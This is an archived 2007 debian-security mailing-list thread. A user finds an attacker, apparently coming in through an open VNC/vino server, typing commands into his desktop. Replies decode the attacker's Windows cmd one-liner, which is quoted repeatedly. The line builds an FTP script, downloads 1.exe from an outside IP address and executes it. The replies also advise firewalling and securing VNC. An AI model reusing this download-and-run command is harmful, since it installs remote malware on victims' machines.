Re: spooky windows script
That's just what I've done: closed the vnc-holes in my firewall (btw it does use a blacklist on incoming connections), and configured the vino-server to not be running by default and when it runs to not accept any unauthorised connections. Let's see if that does the trick. Greetings, Jan > Datum: 09/05/07 08:11 AM > Van: "Lee Braiden" <[EMAIL PROTECTED]> > Aan: debian-security@lists.debian.org > CC: > Onderwerp : Re: spooky windows script > > On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote: > > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió: > > > Chris Adams schrieb: > > > > Do you have a VNC server installed? > > > > > > > | But I do have vino-server running. > > > > > > Yes. > > > > That's the problem, the same happened to me a couple of weeks ago, in my > > Desktop(a newly installed Debian Unstable). > > > > Vino seems to open the vnc port to the outside without password when > > installed by default. > > I would say the problem is more that his system is configured to allow any > servers without explicit authorisation. That could just as easily have been > a trojan or rootkit opening a port. Best to setup your firewall to block all > incoming connections by default, and explicitly allow only what your system > is actually serving, and only to machines it needs to serve. > > -- > Lee > > >
Re: spooky windows script
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote: > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió: > > Chris Adams schrieb: > > > Do you have a VNC server installed? > > > > > | But I do have vino-server running. > > > > Yes. > > That's the problem, the same happened to me a couple of weeks ago, in my > Desktop(a newly installed Debian Unstable). > > Vino seems to open the vnc port to the outside without password when > installed by default. I would say the problem is more that his system is configured to allow any servers without explicit authorisation. That could just as easily have been a trojan or rootkit opening a port. Best to setup your firewall to block all incoming connections by default, and explicitly allow only what your system is actually serving, and only to machines it needs to serve. -- Lee
Re: spooky windows script
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote: > El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribi?: > > Chris Adams schrieb: > > > > > Do you have a VNC server installed? > > > > | But I do have vino-server running. > > That's the problem, the same happened to me a couple of weeks ago, in my > Desktop(a newly installed Debian Unstable). > > Vino seems to open the vnc port to the outside without password when > installed by default. No, vino doesn't do anything by default (just confirmed in sid). What do you have configured in System -> Preferences -> Remote Desktop ? By default, nobody can connect at all. Clicking on the only initially active checkbox ("Allow other users to view your desktop") results in a configuration where other users can connect, but they can't actually view or control your desktop until you've approved their connection via a popup dialog. If you uncheck "Ask you for confirmation" and neglect to check "Require the user to enter this password" and provide a password, then it seems that unauthenticated, unapproved connections are allowed. IMO this should never ever be allowed, but it is. It's definitely not the default state, though. noah signature.asc Description: Digital signature
Re: spooky windows script
El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió: > Chris Adams schrieb: > > > Do you have a VNC server installed? > > | But I do have vino-server running. > > Yes. That's the problem, the same happened to me a couple of weeks ago, in my Desktop(a newly installed Debian Unstable). Vino seems to open the vnc port to the outside without password when installed by default. > > -- Gerardo Curiel <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> Geek By NaTure,LiNuX By ChOiCe,DebiAn of CoUrsE gpg fingerprint: 228B 0F96 8653 DF52 9740 B75E FB32 9C30 E179 7BD2 http://www.debian.org signature.asc Description: Esta parte del mensaje está firmada digitalmente
Re: spooky windows script
Chris Adams schrieb: > Do you have a VNC server installed? | But I do have vino-server running. Yes. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On Tue, 8 May 2007 18:17:08 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > > > > > Well, > > > > to specify on this, I am running Debian testing, and surfing with Firefox > > 2.0. > > > > The script gets typed in any window that's active at the moment the cursor > > is being taken over: it may be the Firefox 'find'-field or a terminal > > window for that matter. > > > > I've checked my filesystem and no 1.exe file seems to be present. > > > > My IP-address is assigned dynamically by my ISP; it differs every time I > > log in. But I do have vino-server running. I'm going to check on that. > > > > thanks Just for the record, I apparently interpreted the ftp business backward in my earlier post; pulling in, not sending out. Celejar -- mailmin.sourceforge.net - remote access via secure (OpenPGP) email ssuds.sourceforge.net - A Simple Sudoku Solver and Generator -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On May 8, 2007, at 9:17 AM, Jan Outhuis wrote: The script gets typed in any window that's active at the moment the cursor is being taken over: it may be the Firefox 'find'-field or a terminal window for that matter. Do you have a VNC server installed? If so you really want to either remove it or configure it to only listen on localhost so you can access it over an SSH tunnel but remote attackers can't get in. I'd also strongly recommend that you configure the built-in firewall since it you may have other exposed services - unfortunately I don't have a package recommendation as I just configure iptables directly. I've seen this happen a couple of times on Macs where people inadvertently left VNC open w/o a password with very similar behaviour, which suggests people are scanning for vulnerable VNC installs but the automated stuff currently only has Windows exploits. Chris smime.p7s Description: S/MIME cryptographic signature
Re: spooky windows script
> Well, > > to specify on this, I am running Debian testing, and surfing with Firefox 2.0. > > The script gets typed in any window that's active at the moment the cursor is > being taken over: it may be the Firefox 'find'-field or a terminal window for > that matter. > > I've checked my filesystem and no 1.exe file seems to be present. > > My IP-address is assigned dynamically by my ISP; it differs every time I log > in. But I do have vino-server running. I'm going to check on that. > > thanks > > > Datum: 08/05/07 04:15 PM > > Van: "David Clymer" <[EMAIL PROTECTED]> > > Aan: debian-security@lists.debian.org > > CC: > > Onderwerp : Re: spooky windows script > > > > On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > > > Hello, > > > > > > Recently I'm repeatedly being pestered by a strange event while surfing > > > the net. My cursor is taken over and the following code is typed: > > > > > > %systemroot%\system32\cmd.exe > > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik > > > &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe > > > &exit > > > > > > (I see on my network monitor that this is coming from outside; IP-number > > > and user name vary.) > > > > > > After that all is back to normal. > > > > > > Now this is of course a nuisance, but is it also a thread? And what can > > > be done against it? > > > > > > Anybody got a clue on this? > > > > > > > I'm sure someone has a clue. However, clued listmembers or not, a > > windows security issue is not an appropriate topic for discussion on a > > mailing list called "debian-security". As the name implies, this list is > > for discussing security issues as they relate to the Debian GNU/Linux > > distribution. > > > > -davidc > > > > -- > > A good hot dog feeds the hand that bites it. > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit > > (I see on my network monitor that this is coming from outside; IP-number and > user name vary.) > > After that all is back to normal. > > Now this is of course a nuisance, but is it also a thread? And what can be > done against it? > > Anybody got a clue on this? > I'm sure someone has a clue. However, clued listmembers or not, a windows security issue is not an appropriate topic for discussion on a mailing list called "debian-security". As the name implies, this list is for discussing security issues as they relate to the Debian GNU/Linux distribution. -davidc -- A good hot dog feeds the hand that bites it. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
hi, > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit to clarify what this command line does: it writes the following text lines in a file called "ik": open 59.31.153.120 22783 user db database get 1.exe bye this are FTP commands, which are now being executed by the windows FTP client. the parameters -n -v suppresses user autologin and verboseness and the parameter -s:ik executes the content of the file "ik" as FTP commands. the file ftp://db:[EMAIL PROTECTED]:22783/1.exe is being fetched, the file "ik" is then being deleted and finally the file "1.exe" is being executed. i suppose that 1.exe is some kind of windows trojan or virus. cheers, -stephan loh On 2007.05.08 15:39, Celejar wrote: > On Tue, 8 May 2007 14:57:24 +0200 (CEST) > Jan Outhuis <[EMAIL PROTECTED]> wrote: > > > Hello, > > > > Recently I'm repeatedly being pestered by a strange event while surfing the > > net. My cursor is taken over and the following code is typed: > > > > %systemroot%\system32\cmd.exe > > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik > > &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit > > > > (I see on my network monitor that this is coming from outside; IP-number > > and user name vary.) > > > > After that all is back to normal. > > > > Now this is of course a nuisance, but is it also a thread? And what can be > > done against it? > > > > Anybody got a clue on this? > > > > Tia, > > > > Jan Outhuis > > Are you running linux or windows? With what program are you surfing? > Where is that text displayed? The cmd.exe line looks like someone > trying to open the windows command shell; the next line looks like > someone trying to capture some data from your system and ftp it > outwards. I'm just guessing, but it does appear to be a threat. > > Celejar > -- > mailmin.sourceforge.net - remote access via secure (OpenPGP) email > ssuds.sourceforge.net - A Simple Sudoku Solver and Generator > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
If this occurred on my Windows box, I would back up what needs to be backed up and reload the OS with something useful. Your machine has clearly been compromised. -- On Tue, 8 May 2007, Celejar wrote: On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit > > (I see on my network monitor that this is coming from outside; IP-number and > user name vary.) > > After that all is back to normal. > > Now this is of course a nuisance, but is it also a thread? And what can be > done against it? > > Anybody got a clue on this? > > Tia, > > Jan Outhuis Are you running linux or windows? With what program are you surfing? Where is that text displayed? The cmd.exe line looks like someone trying to open the windows command shell; the next line looks like someone trying to capture some data from your system and ftp it outwards. I'm just guessing, but it does appear to be a threat. Celejar -- mailmin.sourceforge.net - remote access via secure (OpenPGP) email ssuds.sourceforge.net - A Simple Sudoku Solver and Generator -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while surfing the > net. My cursor is taken over and the following code is typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit > > (I see on my network monitor that this is coming from outside; IP-number and > user name vary.) > > After that all is back to normal. > > Now this is of course a nuisance, but is it also a thread? And what can be > done against it? > > Anybody got a clue on this? > > Tia, > > Jan Outhuis Are you running linux or windows? With what program are you surfing? Where is that text displayed? The cmd.exe line looks like someone trying to open the windows command shell; the next line looks like someone trying to capture some data from your system and ftp it outwards. I'm just guessing, but it does appear to be a threat. Celejar -- mailmin.sourceforge.net - remote access via secure (OpenPGP) email ssuds.sourceforge.net - A Simple Sudoku Solver and Generator -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: spooky windows script
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 8 May 2007 14:57:24 +0200 (CEST) Jan Outhuis <[EMAIL PROTECTED]> wrote: > Hello, > > Recently I'm repeatedly being pestered by a strange event while > surfing the net. My cursor is taken over and the following code is > typed: > > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> > ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik > &1.exe &exit > > (I see on my network monitor that this is coming from outside; > IP-number and user name vary.) > > After that all is back to normal. > > Now this is of course a nuisance, but is it also a thread? And what > can be done against it? > > Anybody got a clue on this? > > Tia, > > Jan Outhuis > Do you have any kind of VNC-servers running? What is you ip-address? Can i scan your open ports from it? - --- Henri Salo +358407705733 GPG ID: 2EA46E4F fp: 14D0 7803 BFF6 EFA0 9998 8C4B 5DFE A106 2EA4 6E4F -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGQHm1Xf6hBi6kbk8RAvTbAJ0es46vFTz+/6upbt8K3lYYV8HhfwCgs5CC LK0OvGWT07LV7sZuH+RItUE= =J58p -END PGP SIGNATURE-
Re: spooky windows script
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote: > %systemroot%\system32\cmd.exe > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo > get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit If you were running a windows system this might do something really nasty since it creates a download script and executes it. Perhaps to pull in a root kit?. I haven't done DOS in a long time so I am a bit shaky in fully interpreting. Check for something named 1.exe in your directory. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]